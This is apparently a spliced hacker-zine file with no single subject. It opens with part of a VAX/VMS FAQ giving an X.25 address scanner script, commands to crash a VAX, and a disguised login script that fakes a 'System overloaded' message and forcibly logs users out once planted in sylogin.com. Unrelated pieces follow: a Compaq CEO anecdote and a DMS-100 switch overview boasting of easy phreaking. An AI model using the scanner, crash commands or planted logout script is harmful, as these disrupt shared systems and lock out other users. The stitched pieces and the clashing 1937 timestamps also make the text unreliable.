$ READ VALUES DTE
$ READ VALUES END
$ CLOSE VALUES
$ LOG = "SCAN.LIS"
$ TMP = "SCAN.TMP"
$ OPEN/WRITE FILE 'LOG
$ WRITE FILE "PREFIX:",PRE
$ WRITE FILE "START :",DTE
$ WRITE FILE "LAST :",END
$LOOP:
$ ON ERROR THEN GOTO OPEN
$ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE'
$ WAIT 00:00:06
$ SPAWNNAME = F$GETJPI("","USERNAME")
$ SPAWNNAME = F$EXTRACT(0,F$LOC(" ",SPAWNNAME),SPAWNNAME) + ""
$ CONTEXT = ""
$FINDPROC:
$ PID = F$PID(CONTEXT)
$ IF PID .EQS. "" THEN GOTO OPEN
$ IF F$LOC(SPAWNNAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID
$ GOTO FINDPROC
$OPEN:
$ ON ERROR THEN GOTO OPEN
$ OPEN/READ PAD 'TMP
$ MSSG = " Process stopped"
$ ON ERROR THEN GOTO CLOSE
$ READ PAD LINE
$ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE
$ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE)
$CLOSE:
$ CLOSE PAD
$ DELETE 'TMP';*
$ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN
$ WRITE FILE PRE,DTE,MSSG
$NOCONN:
$ DTE = DTE + 1
$ IF DTE .LE. END THEN GOTO LOOP
$ CLOSE FILE

( I don't have a clue by whom the code was written. )

then

$ create scan.val
prefix
startingNUA
endingNUA
<CTRL-Z>
$ submit /noprint scan.com
.
.
.
$ search scan.lis "call connected"

[10]

" How do I crash a VAX !? "

$ set default sys$system
$ @shutdown

or

$ set default sys$system
$ run opccrash

[11]

" I have a dostogiefski.cld file; what do I do with it ? "

$ set command dostogiefski.cld

[12]

" Can I send messages to interactive processes ? "

$ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella "

[13]

" How can I prevent someone from phoning me all the time ? "

$ set broadcast=(nophone)

[14]

" Can I postpone/disable interactive logins ? "

$ set logins /interactive=0

$ set logins /interactive

will display current value.

Under the same `logic' :

$ create innocent_filename.com
$ set nocontrol
$ context = ""
$ pid = F$PID(context)
$ user_name = F$GETJPI(pid,"username")
$ wait 00:01:00.00
$ write sys$output ""
$ write sys$output " System overloaded; please try again later "
$ write sys$output " Logging out process ''pid', of user ''user_name' "
$ write sys$output ""
$ logout /full

Add either to sys$system:sylogin.com or sys$login:login.com the following: " $ @innocent_filename.com ".

[15]

" How can I modify the welcome file ? Where is it held ? "

$ set default sys$system
$ edit welcome.txt

[16]

" I am editing a huge text file. How can I reach the end of it ? "

at the editor's prompt type:

*find end

or

*find "search string"

[17]

" How can I be sure that no one is watching me from a hidden process ? "

$ show system /process
VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25
  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
.
.
.
00000114 SYMBIONT4       HIB      5      290   0 00:00:19.05      1650     47
00000117 SMTPSYMBIONT    HIB      4    33398   0 00:16:49.67    246104    426
00000118 SYMBIONT6       HIB      4    47868   0 00:05:09.01       296    121
00001255 SYMBIONT0001    CUR 13  15    64293   0 00:05:08.12      1982    248

$ show system /full

VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43
  Pid    Process Name    State  Pri      I/O       CPU       Page flts Ph.Mem
.
.
.
00000114 SYMBIONT4       HIB      5      290   0 00:00:19.05      1650     47
         [1,4]
00000117 SMTPSYMBIONT    LEF      5    33407   0 00:16:49.78    246116    502
         [1,4]
00000118 SYMBIONT6       HIB      5    47872   0 00:05:09.03       296    121
         [1,4]
00001255 SYMBIONT0001    CUR 13  15    64348   0 00:05:09.60      2063    268
         [1,4]
$

See the difference between the system's SYMBIONT processes ( i.e. SYMBIONT4, SYMBIONT6, SMTPSYMBIONT ) and the one created by using a `stealth' program ( SYMBIONT0001 ); the names and the User Identification Codes may vary, but state, priority, physical memory used, page faults, input/output and Process IDentification numbers, can reveal, in combination, such a nastiness.

Afterwards you may " show process /id=xxxx /continuous ", or " stop /id=xxxx ".
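The comparison described in [17], as an added example (not part of the original FAQ): a Python parser for the SHOW SYSTEM rows quoted above that flags a process departing from its peers on several fields at once. The factor-of-two rule, the three-field threshold and the function names are assumptions made for illustration; the listing is assumed to be narrowed to processes claiming to be the same kind, and the token after CUR is kept uninterpreted.

```python
import re
from collections import Counter

# Constructed input: the four process rows quoted in the answer above.
SAMPLE = """\
00000114 SYMBIONT4 HIB 5 290 0 00:00:19.05 1650 47
00000117 SMTPSYMBIONT HIB 4 33398 0 00:16:49.67 246104 426
00000118 SYMBIONT6 HIB 4 47868 0 00:05:09.01 296 121
00001255 SYMBIONT0001 CUR 13 15 64293 0 00:05:08.12 1982 248
"""

# Scheduler states, used to find the State column (process names may hold spaces).
STATES = {"CUR", "COM", "COMO", "HIB", "HIBO", "LEF", "LEFO", "CEF",
          "SUSP", "SUSPO", "PFW", "FPG", "COLPG", "MWAIT"}
NUMERIC = ("pid", "pri", "io", "page_flts", "ph_mem")


def parse_row(line):
    """Parse one SHOW SYSTEM row; return None for headers and filler lines."""
    tok = line.split()
    if len(tok) < 9 or not re.fullmatch(r"[0-9A-Fa-f]{8}", tok[0]):
        return None
    uic = tok.pop() if tok[-1].startswith("[") else None  # /FULL appends the UIC
    st = next((i for i in range(2, len(tok) - 6) if tok[i] in STATES), None)
    if st is None:
        return None
    try:
        return {
            "pid": int(tok[0], 16), "name": " ".join(tok[1:st]),
            "state": tok[st],
            "extra": tok[st + 1:-6],  # e.g. the "13" after CUR, left uninterpreted
            "pri": int(tok[-6]), "io": int(tok[-5]),
            "cpu": tok[-4] + " " + tok[-3],
            "page_flts": int(tok[-2]), "ph_mem": int(tok[-1]), "uic": uic,
        }
    except ValueError:
        return None


def deviations(row, peers, factor=2):
    """Fields where row is beyond factor x the peers' range, or in another state."""
    out = []
    for field in NUMERIC:
        vals = [p[field] for p in peers]
        if row[field] > factor * max(vals) or row[field] * factor < min(vals):
            out.append(field)
    common = Counter(p["state"] for p in peers).most_common(1)[0][0]
    if row["state"] != common:
        out.append("state")
    return out


def suspects(listing, min_fields=3):
    """Return (name, deviating fields) for rows that differ on min_fields or more."""
    rows = [r for r in map(parse_row, listing.splitlines()) if r]
    found = []
    for r in rows:
        peers = [p for p in rows if p is not r]
        dev = deviations(r, peers) if peers else []
        if len(dev) >= min_fields:
            found.append((r["name"], dev))
    return found


if __name__ == "__main__":
    for name, dev in suspects(SAMPLE):
        print(f"{name}: differs from its peers on {', '.join(dev)}")
```

No single field is decisive here: each of the genuine symbionts deviates on one or two fields by itself, and only the combination singles out one row.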

[18]

" Can I view the CPU usage of each process ? "

$ monitor processes /topcpu

will display a bar-chart of this kind.

[19]

Run the following .COM file and it will display information you'd possibly need on an account and/or node. It uses simple lexical functions.

$ output :== write sys$output
$ output ""
$ context = ""
$ nodeid = F$CSID(context)
$ nodename = F$GETSYI("nodename",,nodeid)
$ if F$GETSYI("cluster_member") .EQS. "TRUE"
$ then output " ''nodename' is a member of a cluster. "
$ else output " ''nodename' is not a member of a cluster. "
$ endif
$ context = ""
$ username = F$GETJPI("","username")
$ output " Username : ''username' "
$ group = F$GETJPI("","grp")
$ output " Group : ''group' "
$ uic = F$USER()
$ output " User Identification Code : ''uic' "
$ pid = F$PID(context)
$ output " Process IDentification : ''pid' "
$ process = F$PROCESS()
$ output " Process Name : ''process' "
$ terminal = F$GETJPI("","terminal")
$ output " Terminal Name : ''terminal' "
$ priority = F$GETJPI("","authpri")
$ output " Authorized Priority : ''priority' "
$ maxjobs = F$GETJPI("","maxjobs")
$ output " Maximum Number of Processes Allowed : ''maxjobs' "
$ authpriv = F$GETJPI("","authpriv")
$ output " Authorized Privileges : ''authpriv' "
$ curpriv = F$GETJPI("","curpriv")
$ output " Current Privileges : ''curpriv' "
$ directory = F$DIRECTORY()
$ output " Directory : ''directory' "
$ protection = F$ENVIRONMENT("protection")
$ output " Protection : ''protection' "
$ boottime = F$GETSYI("boottime")
$ output " Boot Time : ''boottime' "
$ time = F$TIME()
$ output " Current Time : ''time' "
$ version = F$GETSYI("version")
$ output " VMS version : ''version' "
$ output ""

You may :

$ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb

and then transfer lexicals.hlp.

[20]

" How can I view/modify my disk quota limit ? "

DiskQuota was a standalone utility in versions prior to five; it is now a subset of the System Management utility, and thus you should :

$ set def sys$system
$ run sysman
SYSMAN> diskquota show /device=dua1: [1,1]
%SYSMAN-I-QUOTA, disk quota statistics on device DUA1: --
Node
 UIC        Usage    Permanent Quota    Overdraft Limit
[1,1]      123456        1500000              100

SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000

[END]

Post Scriptum

Some operations require privileges.


Compaq CEO blunders on TV

      Compaq CEO Eckard Pfeiffer last week visited The Netherlands
      to do some pr work. During a television interview for NOVA,
      a well known news show that aired last Friday, Pfeiffer
      claimed that pc's were easy to use, and could be used by
      virtually anyone. So, the reporter asked him to switch the
      tv channel on a Presario that was next to Pfeiffer that ran
      a Windows-based TV tuner. The result was Pfeiffer frantically
      clicking on several menu bars, but instead of switching
      channels, he exited the program altogether. To make things
      worse, the reporter next asked him to start up a word
      processor.  Again, Pfeiffer clicked his way around the
      desktop, but couldn't find nor start the program. Finally,
      he was asked to start up a game. You saw Pfeiffer (now in
      deep trouble) clicking on all the tabs of the "easy to use"
      tab-works interface that is included on all Presario's,
      looking for games, while muttering "Were are ze games? I
      can't find ze games on zis machine!!!", his accent becoming
      increasingly more German than before. It was almost like Dr.
      Strangelove. The last shot is of a Compaq tech support guy,
      rushing in to help him out....  So much for ease of use....

Voorburgwal 129, 1012 EP Amsterdam, The Netherlands).


Ok, I'm going to assume that you already know a little bit about what it is you're reading. The DMS100/IBN (integrated business network) is composed of mainly electronic business sets, phones, data units, and attendant consoles and units, all physically at the customer's place of business, while the digital switching software and support hardware is located at the Telco. Together, in tandem, they work to give the customer one of the best combinations of features and benefits. The DMS-100 combines voice AND data in one business communications package. One of its many advantages is that it can be used by a business of any size, with up to 30,000 lines.

The IBN system controls most operations, diagnoses problems, and also has the ability to do limited repairs on itself. Being modular, it can meet the needs at hand and has the ability to take on new features as time goes by, while still maintaining a cost-effective environment. Another advantage is that it uses a central attendant where and when needed, along with Call Routing, or CDR, to control and restrict Long Distance Calling, and network management. The IBN gives the user hassle-free operation. Northern Telecom's DMS-100 switches, which by the way are digital, are frequently backed up by their higher trained personnel, which isn't saying much.

Some other features are: Automatic Routing Selection, or ARS, which routes the long distance calls, if they are even allowed, over the most economical (right) route available. Station Message Detail Recording, or SMDR, which basically does just what its name states, records long distance charges, including but not limited to, originating number, time and length of call, authorization code, and others... Yet another capability is the Direct Inward System Access (DISA), which gives the personnel the ability to use the system to place long distance calls cheaply, even from outside the company (sounds like a PBX a bit doesn't it?).

System Features and Benefits:

There are 6 Call Waiting Lamp Loop Keys, each with its associated source AND destination lamp to signify the status of both the calling and the called party. The second feature is Alpha Numeric Display Multiple Directory Number Feature Keys, up to 42 of them, which can be used for a Paging System, or speed dialing, and things along those lines. A third feature is the Release Source/Release Destination Console, which features access to paging.

Other features, which mainly are unimportant, I will list here. They are: Call Identifier Exclude Source/Exclude Destination. Remote Console Call Destination. Signal Source. Signal Destination. Call Holding. Call Detail Entry. Remote Console Call Selection. Console Display. Camp-on Automatic Recall Conference. A 6 port 2 way splitting non-delayed operation. Busy Verification of Lines. Manual and Automatic Hold. Multiple Console Operation. Busy verification of trunks. Switched Loop Operation. Trunk Group Busy Indication. Uniform Call distribution from queue. Multiple listed directory numbers. Control of trunk group access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. Delayed Operation. Position Busy. Interposition Calling. Through Call Pickup. Ring Again. Multiple Directory Numbers. Intercom. Speed Call. Call Transfer/Conference. On-Hook Dialing.

Additional Programmable Features include automatic hold. Listen-on hold. Multiple Appearance Directory Numbers, or MADN. Single Call Arrangement. Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume Control. Call Waiting. Stored Number Redial. Private Business Line. And finally a 32 character alphanumeric data unit. The DMS100/IBN can be used as a "standalone" or can be attached to the business set or other phone type unit. It has the ability to transmit over a two wire loop, at speeds of up to 56 kb per second, using a proprietary time compression multiplexing technology.

The DMS100 is also available in different models to suit existing terminal capacities. It also provides integrated voice/data, that's right, data, communications. They, the phone company, and data unit, can operate together, simultaneously, or even independent of one another. Being fully digitized, it was one of the first switches to eliminate the use of those dinosaur analog modems (for which i still have a few if anyone wants to buy em off me or give me shipping money and i'll send em to ya free).

Well that's it for now. This should give you a good understanding of the capabilities of one of the many switches in use today. In fact, although outdated somewhat, my telco, citizens utilities, and one in stockton from what i just found out, is still using this switch (poor me in elk grove, ca eh?) which makes phreaking quite an easy task, not that it was really ever hard but anything to make it easier helps. Anyway, if you have any comments/flames/general bullshit, mail it to either jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a last resort email address.

ciao
---Captain Hook

------------------------------------------------------------------------------